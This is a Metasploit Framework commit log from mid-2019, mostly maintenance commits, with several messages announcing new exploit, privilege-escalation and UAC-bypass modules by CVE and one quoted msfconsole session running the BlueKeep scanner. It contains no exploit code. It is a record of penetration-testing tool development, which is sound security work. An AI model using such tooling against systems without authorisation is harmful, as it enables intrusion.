Compare commits

...

1458 Commits

Author SHA1 Message Date
Brent Cook 18b8974761 Land #11969, deprecate db_rebuild_cache command 2019-07-11 11:02:17 -05:00
William Vu 2dcb646a16 Land #12080, system vs. popen for unknown_command 2019-07-10 21:24:42 -05:00
Metasploit 05382849a4 automatic module_metadata_base.json update 2019-07-10 16:04:18 -07:00
Jeffrey Martin 612bd2fcca Land 12079, No effing idea 2019-07-10 17:43:18 -05:00
Tod Beardsley fbfa37916c Tut tut
Edit a blue comment
2019-07-10 17:41:54 -05:00
Adam Cammack b419ab018c Gracefully handle passthrough commands
The `system` method handles input and output as appropriate, allowing
programs that need user input to execute properly without racing
msfconsole over STDIN
2019-07-10 17:40:49 -05:00
Metasploit 6f7c061bb0 automatic module_metadata_base.json update 2019-07-10 09:29:15 -07:00
William Vu 4302c3f3b0 Land #12074, missing split fix for #12072 2019-07-10 11:17:56 -05:00
William Vu c917ec70d1 Fix missing split in struts2_rest_xstream 2019-07-10 11:15:36 -05:00
Metasploit a25f9afc9f automatic module_metadata_base.json update 2019-07-10 08:54:07 -07:00
William Vu cd3ffb92ef Land #12072, cmd_psh_payload arch string fixes 2019-07-10 10:38:22 -05:00
Metasploit c5032df7fd automatic module_metadata_base.json update 2019-07-09 17:52:33 -07:00
h00die 9274b1d259 Land #12024, add gatherproof to ssh_login modules 2019-07-09 20:35:49 -04:00
William Vu e6300bfd63 Fix cmd_psh_payload requiring an arch string
We may want to update Rex::Powershell to take the first in an array.
2019-07-09 17:43:23 -05:00
Metasploit c1c600cbe8 Bump version of framework to 5.0.36 2019-07-04 10:10:16 -07:00
Brent Cook 0897849ddf Land #12045, lock rex-socket to 0.1.17 2019-07-02 16:55:54 -05:00
Metasploit 5eb339368f automatic module_metadata_base.json update 2019-07-02 14:35:20 -07:00
Brent Cook 6ab02ba0bc revert rex-socket back to 0.1.17 for now
This reverts a change that causes SSL certificate generation to not working properly through all of the various shim functions in rex-socket. This is the quickest fix which grants some time to ponder if the interface could be a little more robust in rex-socket in the first place.
2019-07-02 16:32:52 -05:00
William Vu ef20123c34 Land #12044, snmp_enum SNMP::NoSuchInstance fix 2019-07-02 16:26:33 -05:00
William Vu 64b385234f Land #12036, OpenVAS missing workspace import fix 2019-07-02 16:26:26 -05:00
Matthew Kienow 260c369aff Fix network interface processing
The SNMP walk operation can return an SNMP::NoSuchInstance class.
The error class must be handled rather than attempting to use it as a
valid value.
2019-07-02 15:14:55 -04:00
Metasploit eeca72d39b automatic module_metadata_base.json update 2019-07-02 10:59:24 -07:00
William Vu df85377ff3 Land #12042, bypassuac_silentcleanup author fix 2019-07-02 12:43:14 -05:00
William Vu 5e04ab2e66 Add lokiuox to bypassuac_silentcleanup authors
Looks like they were removed by accident.
2019-07-02 12:36:07 -05:00
Metasploit 295c484fe4 automatic module_metadata_base.json update 2019-07-01 14:39:07 -07:00
h00die a42c7ea736 land #11990 windows tomcat cmdlinearguments 2019-07-01 17:29:02 -04:00
h00die 9ab7b7f5e6 add cmdlineargs example 2019-07-01 17:19:04 -04:00
Metasploit eb643793a2 automatic module_metadata_base.json update 2019-07-01 14:16:38 -07:00
asoto-r7 d3056723e1 Land #12030, CVE-2019-12181: Serv-U FTP Server prepareinstallation privesc 2019-07-01 16:01:04 -05:00
Matthew Kienow 4e11dcfee1 Fix import issue caused by missing wspace key
Modify import module to follow pattern used in other Msf::DBManager
import modules. Test module updated for method name changes.
2019-07-01 15:58:36 -04:00
Metasploit d723122e0e automatic module_metadata_base.json update 2019-06-29 03:52:23 -07:00
Brent Cook e50ab5cd13 Land #11726, add exploit for CVE-2019-8513, macOS TimeMachine cmd injection 2019-06-29 05:36:12 -05:00
Brent Cook 6fd18aaf8a add High Sierra scenario 2019-06-29 05:35:29 -05:00
Brent Cook 45734408a6 remove reload_search since refresh_cache_from_module_files seems to not work as expected at runtime 2019-06-29 03:51:56 -05:00
Metasploit 78967c3e6d automatic module_metadata_base.json update 2019-06-29 01:46:05 -07:00
Brent Cook a186396836 unlink the user store if it exists 2019-06-29 03:45:53 -05:00
Brent Cook 4756a17dfa remove update of the base module store 2019-06-29 03:37:54 -05:00
Brent Cook 42c0a3b96a deprecate the db_rebuild_cache command, add reload_search
For a while, Metasploit has not used the old database-backed module cache in favor of the lightweight JSON data store. This also means that the db_rebuild_cache command has been broken.

While the base module cache usually stays up to date, if you delete a module as a developer, there's currently no great way to make the search function forget about that module unless you rebuild the cache manually (a procedure mostly documented inside of an automated build job).

This moves the logic from that build job into the a new reload_search command, and deprecates the old one.
2019-06-29 03:36:39 -05:00
Brent Cook 4e544fe733 Land #11968, only enable UDP stagers for compatible payloads 2019-06-29 03:34:15 -05:00
Brent Cook 83e2c71b44 Land #11923, Set sockaddr_len with x64 shell_find_port payload 2019-06-29 03:26:52 -05:00
Brent Cook 03d1c87eb6 Land #11976, use special-case path for shell command with Android meterpreter 2019-06-29 03:23:27 -05:00
Brent Cook 06f6b0294c Land #12023, repeat search by default 2019-06-29 03:16:03 -05:00
bcoles 895a5b6aec Add software link 2019-06-29 14:15:31 +10:00
bcoles c7ff78c277 Remove spaces at EOL 2019-06-29 14:01:18 +10:00
Brendan Coles 203e3b74db Add Serv-U FTP Server prepareinstallation Privilege Escalation 2019-06-29 03:52:53 +00:00
William Vu 663e61d636 Land #12029, nil fix for core.private.jtr_format 2019-06-28 14:54:06 -05:00
Shelby Pace 6ebe192674 check core.private before accessing jtr_format 2019-06-28 14:17:52 -05:00
William Vu b8165e825d Make help syntax consistent 2019-06-28 14:01:28 -05:00
William Vu b39ed5eb02 Add period 2019-06-28 13:59:52 -05:00
William Vu 3f187d4f0a Update help 2019-06-28 13:58:14 -05:00
William Vu 3c09aa47d7 Once more, with feeling 2019-06-28 13:54:14 -05:00
William Vu fd7f6b2d59 Refactor match/search_params placement 2019-06-28 13:44:24 -05:00
William Vu 353428d10c Prefer cached results when given no arguments 2019-06-28 13:24:40 -05:00
Metasploit a0d10aad94 automatic module_metadata_base.json update 2019-06-28 10:40:38 -07:00
William Vu 0a00f3851a Land #12007, true 0s timeout in send_request_* 2019-06-28 12:32:32 -05:00
William Vu 4bf5e6c53f Land #12014, nil bug fix for HttpServer#get_uri 2019-06-28 12:32:19 -05:00
Metasploit a3a77f8d4b automatic module_metadata_base.json update 2019-06-28 10:20:01 -07:00
William Vu 49176a3606 Land #11952, Supra Smart Cloud TV RFI module 2019-06-28 12:12:15 -05:00
William Vu baa17290e4 Adjust name :) 2019-06-28 12:08:27 -05:00
Metasploit 354da811ec automatic module_metadata_base.json update 2019-06-28 09:42:39 -07:00
asoto-r7 21dd1091fe Land #12025, Fix sshexec hanging on exec! and blocking close 2019-06-28 11:15:06 -05:00
Dhiraj Mishra 09d6ae3458 Removing comments
Thanks wvu-r7 for your support.
2019-06-28 16:17:08 +05:30
Dhiraj Mishra 3279c66721 Adding documentation 2019-06-28 15:57:59 +05:30
William Vu d7a5eae146 Fix bug, adjust prints, and check body for "OK" 2019-06-28 04:12:57 -05:00
Metasploit c0f8e7cea6 automatic module_metadata_base.json update 2019-06-27 20:12:41 -07:00
William Vu 7a26e1c257 Fix sshexec hanging on exec! and blocking close 2019-06-27 22:07:37 -05:00
William Vu 51630839ba Land #12022, LoginScanner/PASSWORD_SPRAY fix 2019-06-27 21:56:28 -05:00
William Vu 744a1dca75 Add the ability to display previous search results 2019-06-27 21:27:20 -05:00
William Vu dc81adb417 Add GatherProof advanced option to ssh_login* 2019-06-27 21:04:20 -05:00
William Vu 0a10d41250 Add skip_gather_proof to LoginScanner::SSH 2019-06-27 21:00:29 -05:00
James Barnett 2ed8e6db97 Deregister PASSWORD_SPRAY option for LoginScanner modules 2019-06-27 17:06:32 -05:00
Metasploit fcd77b1314 Bump version of framework to 5.0.35 2019-06-27 11:41:42 -07:00
Metasploit 58e36b6e51 Bump version of framework to 5.0.34 2019-06-27 10:04:44 -07:00
Metasploit 774eaa0029 automatic module_metadata_base.json update 2019-06-27 10:02:29 -07:00
William Vu 1503dcd168 Land #11997, SilentCleanup UAC bypass 2019-06-27 11:52:56 -05:00
Metasploit 6c7e08c8fc automatic module_metadata_base.json update 2019-06-27 09:45:39 -07:00
William Vu 6f1aaac70e Add enigma0x3 and fix nyshone69 researchers 2019-06-27 11:38:34 -05:00
asoto-r7 26cd53efb6 Land #11977, AWS EC2, S3, and IAM Enumeration 2019-06-27 11:29:05 -05:00
William Vu 7b0aac72ec Fix missing is_in_admin_group? method
This was missed in the refactor, since admin_group was removed.
2019-06-27 11:16:49 -05:00
asoto-r7 7de8d76beb Fixed merge conflict with Gemfile.lock 2019-06-27 11:15:55 -05:00
Metasploit 76f907c3a4 automatic module_metadata_base.json update 2019-06-26 23:56:48 -07:00
William Vu 56a620c64a Land #12019, typo fix for bypassuac_sluihijack 2019-06-27 01:47:25 -05:00
Jeff McJunkin 2927fd5dc8 Update bypassuac_sluihijack: Fix typo 2019-06-26 14:25:32 -07:00
asoto-r7 18f62926ce Updated Gemfile.lock 2019-06-26 16:00:46 -05:00
asoto-r7 ec9bbfa5ae Documentation for all three AWS enum_* modules 2019-06-26 14:59:22 -05:00
asoto-r7 0c83e55b00 enum_iam: Update 'Console Login' output to accurately reflect Disabled status 2019-06-26 14:57:32 -05:00
Metasploit e5868170fd automatic module_metadata_base.json update 2019-06-26 10:35:25 -07:00
William Vu 61f09d0538 Land #12017, xdebug_unauth_exec nil fix 2019-06-26 12:26:30 -05:00
Metasploit 11ef19d264 automatic module_metadata_base.json update 2019-06-26 09:23:41 -07:00
William Vu a1a630b7af Land #12018, Pen Test Partners reference for RV130 2019-06-26 11:13:39 -05:00
William Vu cc3fd747aa Add Pen Test Partners reference
Did we somehow miss this?
2019-06-26 11:05:22 -05:00
Patrick Webster 8d6f36e05c Minor fix for xdebug_unauth_exec
Avoid triggering error where res.headers may not exist.
2019-06-27 01:00:49 +10:00
William Vu 59d75a1658 Land #12015, dcerpc_getarch documentation fix 2019-06-26 02:44:07 -05:00
William Vu 9fe138e3dc Remove misleading comment from dcerpc_getarch
I transferred my implementation. I don't understand this comment.
2019-06-26 02:40:16 -05:00
William Vu 933b5f0413 Tidy up send_request_cgi 2019-06-26 00:59:53 -05:00
William Vu 00530031fd Try not encoding the GET parameters 2019-06-26 00:55:23 -05:00
William Vu f3b509a1bc Implement on_request_uri 2019-06-25 23:47:19 -05:00
William Vu fe11eabe62 Merge remote-tracking branch 'upstream/master' into pr/11952 2019-06-25 23:47:06 -05:00
William Vu 01b308fe7c Fix get_resource nil bug in HttpServer#get_uri 2019-06-25 23:10:50 -05:00
asoto-r7 0c92c69e95 Initial enum_s3 documentation 2019-06-25 18:07:03 -05:00
Wei Chen b59fd4331b Update documentation 2019-06-25 17:14:10 -05:00
Wei Chen 2fb129ad41 Allow check in exploit to be optional 2019-06-25 17:13:55 -05:00
asoto-r7 84b6f05947 Fix 'bucket' typo 2019-06-25 16:35:44 -05:00
Metasploit b672412aeb automatic module_metadata_base.json update 2019-06-25 14:32:35 -07:00
Wei Chen 685fb55179 Land #11987, Add Nagios XI 5.5.6 magpie_debug Root Exploit 2019-06-25 16:17:50 -05:00
Wei Chen 01c49f22fb Change doc name 2019-06-25 16:16:32 -05:00
Wei Chen 23dbc4d90d Change file name 2019-06-25 16:10:44 -05:00
Wei Chen e9fc9970ba Make names more random. Also, make metadata changes 2019-06-25 16:09:15 -05:00
asoto-r7 de97615e9d Land #12013, Make SRVHOST the callback address in confluence_widget_connector 2019-06-25 16:06:37 -05:00
Metasploit 29d9f3ea28 Bump version of framework to 5.0.33 2019-06-25 13:08:28 -07:00
Metasploit 07cb5c5e10 Bump version of framework to 5.0.32 2019-06-25 12:57:14 -07:00
William Vu 5c14aea1a0 Fix target_platform check (it's empty, not nil) 2019-06-25 12:56:36 -05:00
William Vu cf140f0840 Make SRVHOST the callback address 2019-06-25 12:43:04 -05:00
Metasploit dae98d27d7 automatic module_metadata_base.json update 2019-06-24 23:05:38 -07:00
William Vu 77395749da s/infinite/indefinite/ 2019-06-25 01:00:08 -05:00
William Vu 44ad25ae34 Land #12008, struts2_content_type_ognl 302 fix 2019-06-25 00:40:58 -05:00
Carter Brainerd 5e8b076714 Final review changes 2019-06-25 07:21:08 +02:00
James Lee 303bfaa7eb Don't worry about response code
I found one that returned a 302
2019-06-24 13:53:31 -05:00
William Vu 7739e9f43e Update my modules 2019-06-24 13:38:14 -05:00
Jacob Robles 8be8aa603c Adjust logic
Early return to reduce nesting ifs
2019-06-24 12:43:26 -05:00
Jacob Robles 3d143f366c Remove LIMIT and adjust quotes 2019-06-24 12:40:01 -05:00
William Vu b49fa29a7f Allow true zero-second timeout in send_request_*
Also fixes a bogus response when timeout is nil.
2019-06-24 12:07:24 -05:00
Metasploit 6a55227c56 automatic module_metadata_base.json update 2019-06-22 00:52:07 -07:00
William Vu 1f5137fcb6 Land #11996, ZDI reference for rails_double_tap 2019-06-22 02:34:14 -05:00
Carter Brainerd d2dc5f6077 Review changes 2019-06-22 00:18:44 -04:00
Carter Brainerd d90dba5d6e Hopefully final msftidy fixes 2019-06-20 17:03:38 -04:00
Carter Brainerd 679f55d0c5 Docs cleanup 2019-06-20 17:02:02 -04:00
asoto-r7 fa5cdb6ff3 Remove unecessary gems (we might add them back later) 2019-06-20 15:09:25 -05:00
asoto-r7 358ff635dd Renamed modules per @wvu's offline suggestion 2019-06-20 15:08:30 -05:00
Carter Brainerd 96b499080c Add docs 2019-06-20 15:01:53 -04:00
Carter Brainerd 1a877abe09 Msftidy was not happy 2019-06-20 14:50:56 -04:00
Carter Brainerd 534e2bc405 Make the darn thing work 2019-06-20 14:40:46 -04:00
Carter Brainerd fded7fb922 Create bypassuac_silentcleanup.rb 2019-06-20 13:53:54 -04:00
Metasploit 8244457b33 Bump version of framework to 5.0.31 2019-06-20 10:05:48 -07:00
Wei Chen 8920152eca Add a ZDI reference for CVE-2019-5420 Rails exploit 2019-06-20 10:43:21 -05:00
Metasploit 4fa6fb8db9 automatic module_metadata_base.json update 2019-06-19 12:52:21 -07:00
Jeffrey Martin e1b982dfa9 Land #11993, Explicitly require 'rc4' in the BlueKeep scanner. 2019-06-19 14:42:01 -05:00
Jeffrey Martin e98e69fb80 add automation tests for bluekeep server targets 2019-06-19 13:54:14 -05:00
Metasploit fba601b584 automatic module_metadata_base.json update 2019-06-19 09:07:26 -07:00
Wei Chen a93a520c3a Land #11960, Add LPE for Cisco Prime Infrastructure's runrshell exe 2019-06-19 10:49:17 -05:00
Wei Chen c637755ebd Land #11956 - Add Cisco Prime Infrastructure Health Monitor Tar RCE 2019-06-19 10:46:35 -05:00
Metasploit a61401b1f8 automatic module_metadata_base.json update 2019-06-19 06:57:30 -07:00
Shelby Pace 4d7d807025 Land #11983, add Webmin package update rce 2019-06-19 08:35:01 -05:00
Shelby Pace ddf7eadeee modified version check 2019-06-19 08:31:48 -05:00
Pearce Barry 3f0810502e Explicitly require 'rc4' in the BlueKeep scanner.
Appears to still operate as-expected:

	msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
	msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts <target>
	rhosts => <target>
	msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run

	[+] <target>:3389      - The target is vulnerable.
	[*] <target>:3389 - Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed

Fixes MS-4291.
2019-06-19 08:27:04 -05:00
Wei Chen 0cec80ba24 update doc 2019-06-18 21:34:16 -05:00
Jacob Robles efeb0a5f5c Land #11971, zip extraction from modbus pcap 2019-06-18 16:25:27 -05:00
Wei Chen 384cfc7db5 update checkcode 2019-06-18 15:58:57 -05:00
Wei Chen 16cfd3f4ac Fix typos 2019-06-18 15:49:40 -05:00
Wei Chen 4a32164370 Add doc for CVE-2019-0232 2019-06-18 15:28:42 -05:00
Wei Chen 585a4340b2 Add exploit for CVE-2019-0232: Apache Tomcat CGIServlet RCE 2019-06-18 15:28:11 -05:00
Jacob Robles 2873284323 Doc updates 2019-06-18 14:28:43 -05:00
Jacob Robles 4d1bd60853 Update documentation 2019-06-18 14:16:34 -05:00
Jacob Robles 66c3c6a94b Remove unused mixin, update save loot logic
Capture mixin was not used. Loot was being
saved when a zip file wasn't found. Updated
file path so the module is under analyze.
2019-06-18 14:08:47 -05:00
Özkan Mustafa Akkuş 992a638a79 Merge pull request #1 from space-r7/pr11983
Add minor module changes
2019-06-18 09:58:20 +03:00
Chris Higgins ceba93e84e Land #11904, fix meterpreter screenshot dll upload 2019-06-17 23:36:29 -05:00
asoto-r7 36eeba4e37 Address code review from @jrobles-r7. Thanks! 2019-06-17 16:19:45 -05:00
yaumn 8723775564 Add a module documentation file 2019-06-17 21:50:03 +01:00
Shelby Pace d4d2eab770 removed some whitespace, added a check 2019-06-17 15:29:08 -05:00
asoto-r7 850951e261 Fix a bug in MFA output, and also try to fix Travis complaintsy 2019-06-17 15:01:51 -05:00
Özkan Mustafa Akkuş a5020b8f30 Fix spaces at EOL 2019-06-17 13:16:56 +03:00
Özkan Mustafa Akkuş b5e34cb783 Converting version check request to vars_get
We also need to add the "testing = 1" cookie to the login request. Otherwise, the browser displays a No-Cookie error.
2019-06-17 10:46:46 +03:00
yaumn e13456ce0d Add root to the filename 2019-06-16 23:32:57 +01:00
siberguvenlik 17f686a87d Adding module documentation 2019-06-16 18:27:01 -04:00
yaumn 8faa138289 Change targets and default http delay 2019-06-16 23:13:45 +01:00
siberguvenlik 3d463a1e20 Adding correction of Check and Payload definitions 2019-06-16 17:58:31 -04:00
yaumn 863beaea92 First commit for module Nagios XI RCE 2019-06-16 22:10:32 +01:00
siberguvenlik 414c614b55 CVE-2019-12840 - Add Webmin 1.910 RCE Module 2019-06-16 11:26:00 -04:00
Metasploit eb8e0e238d automatic module_metadata_base.json update 2019-06-14 19:47:04 -07:00
William Vu 379caff828 Land #11932, TLS and doc'd packets for BlueKeep 2019-06-14 21:10:08 -05:00
William Vu 3d8b474632 Clean up module 2019-06-14 21:09:57 -05:00
William Vu 282e2b3d78 Land #11979, missing bind_tcp_rc4 tests 2019-06-14 20:57:56 -05:00
Jeffrey Martin b6aa04bbe4 add missing bind_tcp_rc4 payload tests 2019-06-14 16:18:31 -05:00
bwatters-r7 b67b48fd50 Land #11966, Stop error rendering in multi/meterpreter handler
Merge branch 'land-11966' into upstream-master
2019-06-14 14:01:58 -05:00
jdiog0 6646295d51 modbus zip
Co-Authored-By: @shellfail <jrobles@rapid7.com>
2019-06-14 19:27:54 +01:00
asoto-r7 e2d4dc5f41 Initial concept for AWS IAM enumeration 2019-06-14 13:23:20 -05:00
asoto-r7 1d800a5d9a Move error handling method up, in preparation for making a library, maybe 2019-06-13 18:40:34 -05:00
asoto-r7 54a17e0a51 Initial concept for AWS S3 enumeration 2019-06-13 18:40:16 -05:00
Tim W 3338401708 fix #11975, fix meterpreter shell command on android 2019-06-14 06:01:53 +08:00
Adam Cammack 1f6d61dde8 Land #11965, Add secure Meterpreter command
The command will force or renegotiate TLV encryption on the for the
current session.
2019-06-13 14:20:50 -05:00
Metasploit a2b29de2f7 automatic module_metadata_base.json update 2019-06-13 12:12:49 -07:00
bwatters-r7 b9cefe1b79 Land #11958, abrt_raceabrt_priv_esc: Fix abrt package version check
Merge branch 'land-11958' into upstream-master
2019-06-13 14:02:15 -05:00
Metasploit 1789ca21eb automatic module_metadata_base.json update 2019-06-13 10:30:03 -07:00
bwatters-r7 aed504c0a9 Land #11944, Implement bind TCP with RC4 decryption for x64
Merge branch 'land-11944' into upstream-master
2019-06-13 12:09:31 -05:00
Metasploit 644a70ff15 Bump version of framework to 5.0.30 2019-06-13 10:07:30 -07:00
William Vu dfd74107c0 Land #11974, full path in pgrep -lf output 2019-06-13 10:48:47 -05:00
William Vu bcee6f0dc2 Join full path nicely 2019-06-13 10:30:36 -05:00
William Vu 8e6fbcb4b5 Concatenate path and name in Meterpreter pgrep -lf 2019-06-12 19:13:02 -05:00
Brent Cook f11a205b41 remove patchupdllinject 2019-06-12 17:39:56 -05:00
William Vu 2d14966b0b Land #11963, kill command help correction 2019-06-12 11:00:38 -05:00
Tom Sellers a2863ff3cf Add comment to pdu_connect_initial 2019-06-12 10:46:12 -05:00
Tom Sellers 008f9061f6 Randomize client random, sanity check fields 2019-06-12 07:49:45 -05:00
asoto-r7 f96de95acc Initial concept for AWS EC2 enumeration 2019-06-11 19:10:59 -05:00
Brent Cook c13cf63f2d remove dllinject 2019-06-11 17:58:57 -05:00
Tom Sellers f4aa86c9b3 rubocop cleanup 2019-06-11 13:29:05 -05:00
Metasploit b1793f2d50 automatic module_metadata_base.json update 2019-06-11 11:14:07 -07:00
Tom Sellers cc93b312ac Add ability to configure username, client, IP, etc 2019-06-11 13:07:59 -05:00
Brent Cook fa09b239e8 Land #11941, add support for module aliases 2019-06-11 12:57:01 -05:00
Brent Cook 20d21bb7cc update specs, add a few more compat modules 2019-06-11 12:56:11 -05:00
Metasploit c79d86e562 automatic module_metadata_base.json update 2019-06-11 07:49:47 -07:00
Matthew Kienow c80f6f9141 Land #11970, Correct Websphere module CVE ref 2019-06-11 10:30:10 -04:00
Matthew Kienow d91459f2eb Correct module CVE reference 2019-06-11 09:14:40 -04:00
Brent Cook 4d6e0e9892 https 2019-06-11 04:48:52 -05:00
Brent Cook 44dfc3506d add udpsockedi, tag compatible payloads
Not all payloads compatible with TCP stagers are compatible with UDP
stagers, so assuming sockedi is not sufficient to ensure compatibility.
This adds a udpsockedi which pairs compatible payloads together.
2019-06-11 04:19:14 -05:00
OJ 5621d200cc Stop error rendering in multi/meterpreter
The reverse_http/s listeners result in awful errors when
multi/meterpreter is set as the payload. Anyone that hits the endpoint
with an invalid or missing UUID will spam the MSF console with
exceptions.

This patch avoids this issue in cases where the UUID isn't specific. We
avoid setting it as a default, which doesn't make sense anyway.
2019-06-11 13:39:52 +10:00
OJ 0e0edeb372 Add a secure command to renegotiate TLV encryption
This gives us the ability to force TLV encryption if for some reason
it's not already in place, and it means we can renegotiate a new key on
the fly if we want to.
2019-06-11 08:26:33 +10:00
William Vu 36cc535c8a Remove jobs options from kill help
They do not apply.
2019-06-10 16:29:14 -05:00
Wei Chen 5c97c2fa19 Land #11951, Add meterpreter > screenshare command 2019-06-10 13:25:27 -05:00
Wei Chen d74881a3c0 Update based on bcole's feedback 2019-06-10 12:12:49 -05:00
Wei Chen caa9987a77 Register payload for cleanup 2019-06-10 11:20:25 -05:00
Wei Chen d63484562c Correct disclosure date 2019-06-10 11:14:41 -05:00
Wei Chen 12cfada465 Add Cisco Prime Infrastructure runrshell Privilege Escalation 2019-06-10 10:29:43 -05:00
Brendan Coles 8cac968acb Fix abrt package version check 2019-06-10 02:21:10 +00:00
Metasploit 361f9602a8 automatic module_metadata_base.json update 2019-06-08 11:50:58 -07:00
William Vu 6f16a44c8d Land #11957, CVE references for TrueOnline modules 2019-06-08 13:32:38 -05:00
Pedro Ribeiro 6693e3e347 add cve to trueonline v2 2019-06-08 17:41:04 +07:00
Pedro Ribeiro 903ea5ebce add cve to p660hn v1 2019-06-08 17:38:44 +07:00
Pedro Ribeiro c763f84348 add cve to billion module 2019-06-08 17:37:05 +07:00
Pedro Ribeiro 08258dd7ce Merge pull request #8 from rapid7/master
hhhh
2019-06-08 17:35:36 +07:00
Wei Chen 4d6d06c9f9 Update disclosure date 2019-06-07 15:59:59 -05:00
Brent Cook 83528b8bb1 Land #11798, Add Extended Passive Mode for FTP client
Merge remote-tracking branch 'upstream/pr/11798' into upstream-master
2019-06-07 15:09:23 -05:00
Metasploit 3a77e3454e automatic module_metadata_base.json update 2019-06-07 13:05:35 -07:00
Wei Chen 2053513dc5 Minotr update for cpi_tararchive_upload 2019-06-07 13:12:14 -05:00
Wei Chen 1968e0d009 Add module doc for Cisco TarArchive exploit 2019-06-07 13:09:28 -05:00
William Vu a8867992ae Add minimal HttpServer support 2019-06-07 11:53:47 -05:00
William Vu d943b4d314 Fix style 2019-06-07 11:44:17 -05:00
William Vu be6a34398a Rename module to match product 2019-06-07 11:33:10 -05:00
William Vu 9e47e061f2 Remove rank to appease msftidy 2019-06-07 11:28:39 -05:00
Brent Cook 3f5f48a3fc Land #11340, make SSH agent and other options configurable 2019-06-07 11:22:31 -05:00
William Vu 397e6b16a4 Move aux module out of exploits 2019-06-07 11:18:33 -05:00
Metasploit da6a225ef8 Bump version of framework to 5.0.29 2019-06-07 09:03:32 -07:00
Brent Cook 5aed1f7dfe Land #11914, Fix external file import via web service 2019-06-07 06:03:42 -05:00
Wei Chen 69492d2a25 Add Cisco Prime Infrastructure Health Monitor TarArchive Exploit 2019-06-07 03:08:57 -05:00
William Vu a1038bf9a8 Land #11954, Retina XML importer fixes and updates 2019-06-07 00:40:28 -05:00
William Vu dd101a0469 Add nil check
Just in case.
2019-06-07 00:16:44 -05:00
William Vu 53ea7e577f Add sanitized new XML format 2019-06-07 00:07:50 -05:00
William Vu 10dccfcedb Remove warning
<context> provides service info now:

<context>TCP:443 ([redacted]), SHA256[=][redacted], Serial[=][redacted]</context>
2019-06-06 23:45:07 -05:00
William Vu 40eeae541b Fix style 2019-06-06 23:38:41 -05:00
Jeffrey Martin f646a973a7 Update retina imports to better handle parsing 2019-06-06 19:13:06 -05:00
James Barnett 37414b5760 Land #11948, surface errors returned from remote data service in console 2019-06-06 12:40:42 -05:00
William Vu b020e3232b Move warning suppression 2019-06-06 12:33:54 -05:00
Metasploit 614c1afc41 Bump version of framework to 5.0.28 2019-06-06 10:07:53 -07:00
William Vu 19bd0f2183 Add comments 2019-06-06 10:50:26 -05:00
Dhiraj Mishra 6333271320 supra_smart_tv_rfi 2019-06-06 16:17:28 +05:30
Tim W 49ce878497 refactor html code into separate module 2019-06-06 13:39:53 +08:00
Metasploit e76fd32bc1 automatic module_metadata_base.json update 2019-06-05 13:30:30 -07:00
Jacob Robles af1afca1e3 Land #11940, Add files to test that may not be open 2019-06-05 15:03:33 -05:00
Adam Cammack 0516441549 Land #11949, Fix wordpress_content_injection CVE 2019-06-05 14:54:01 -05:00
Matthew Kienow 3c4699c848 Remove unnecessary leading slash from log message 2019-06-05 15:10:00 -04:00
Matthew Kienow 25f45144e8 Handle exceptions raised by get_msf_version call
Exceptions may be raised via the remote data service response handling
while making the call to check the MSF version.
2019-06-05 15:09:33 -04:00
Jacob Robles bf6a62fba8 Add workspace arg to spec 2019-06-05 08:47:13 -05:00
Clément Notin 69ab2154ad wordpress_content_injection: fix CVE number 2019-06-05 12:43:16 +02:00
Metasploit 8c3d7b3900 automatic module_metadata_base.json update 2019-06-04 10:58:45 -07:00
Jacob Robles 9edf92434c Land #11895, CVE-2018-20434 LibreNMS cmd injection exploit 2019-06-04 12:28:24 -05:00
Metasploit 7366994f7b automatic module_metadata_base.json update 2019-06-04 10:26:24 -07:00
Jacob Robles c93c65cef5 Update date format 2019-06-04 12:24:00 -05:00
Matthew Kienow 749501d449 Refactor remote data service response handling
Raises exceptions for error responses rather than failing silently.
This exposes the server-side error message to the user in console.
2019-06-04 12:09:06 -05:00
Matthew Kienow 8fe11744bd Use the revised ResponseWrapper error classes 2019-06-04 11:59:00 -05:00
Matthew Kienow 52c67a6952 Modify ResponseWrapper to support three states
There is a success response, an error response and a failed response.
An error response contains a body with an error message from the
server-side, while a failed response represents an invalid response
caused by an issue with the request or response.
2019-06-04 11:56:12 -05:00
Jacob Robles c1572c89a8 Land #11841, IBM WAS Network Deployment RCE CVE-2019-4279 2019-06-04 11:49:05 -05:00
Jacob Robles 129bb898d8 Merge CMD Target Update 2019-06-04 11:47:28 -05:00
bwatters-r7 eff819b523 Land #11945, Make auto_cl more selective based on HTTP method
Merge branch 'land-11945' into upstream-master
2019-06-04 09:04:13 -05:00
Tom Sellers e15840f8db Add nil check for quick response 2019-06-04 08:36:58 -05:00
bwatters-r7 c28b15e9fe Land #11823, Handle invalid payloads more clearly
Merge branch 'land-11823' into upstream-master
2019-06-04 08:34:41 -05:00
Jacob Robles 8687a21f2d Fix workspace calls 2019-06-04 08:33:58 -05:00
bwatters-r7 cd182e2014 Land #11938, fix cmd_exec tests on python/windows
Merge branch 'land-11938' into upstream-master
2019-06-04 08:01:49 -05:00
bwatters-r7 bee013a18c update cache size and fix an assignment 2019-06-04 07:13:34 -05:00
Tom Sellers 6a8e4366ae Improve XP stabilty, trim dead code 2019-06-04 06:53:36 -05:00
Tom Sellers 9d17832347 Deal with virtual channel data blob 2019-06-04 05:49:45 -05:00
Brent Cook e5a4c2d341 Make auto_cl more selective based on HTTP method
According to https://tools.ietf.org/html/rfc7230#section-3.3.2, a zero content-length is valid for some kinds of HTTP methods.

Instead of implicitly disabling auto_cl if there is no actual content, disable auto_cl default for HTTP methods where semantics of the message do not anticipate any content. This can still be overridden by a caller if it still wants to add an empty content-length for HTTP methods where it does not normally make sense (e.g. if it exploits a bug.)
2019-06-04 04:04:08 -05:00
Metasploit d50cf542cf automatic module_metadata_base.json update 2019-06-03 23:13:42 -07:00
Wei Chen b8abb550e6 Land #11924, Update adobe_flash_opaque_background_uaf for Win 10 2019-06-04 00:51:34 -05:00
Wei Chen 191d73f3ef Update rex-exploitation 2019-06-04 00:40:01 -05:00
Metasploit 30a0f25eae automatic module_metadata_base.json update 2019-06-03 17:13:46 -07:00
Wei Chen 17170e2152 Land #11937, make content-length header optional 2019-06-03 18:56:27 -05:00
RageLtMan ff1630ad14 Implement bind TCP with RC4 decryption for x64
Update metasm generated shellcode blocks to cobble together an
RC4 decryption routine with a bind-socket handler for x64 targets.
Expose via new payload module
2019-06-03 18:06:53 -04:00
bwatters-r7 6f711dfab4 Land #11918, replace trivial usage of expand_path with getenv
Merge branch 'land-11918' into upstream-master
2019-06-03 16:59:39 -05:00
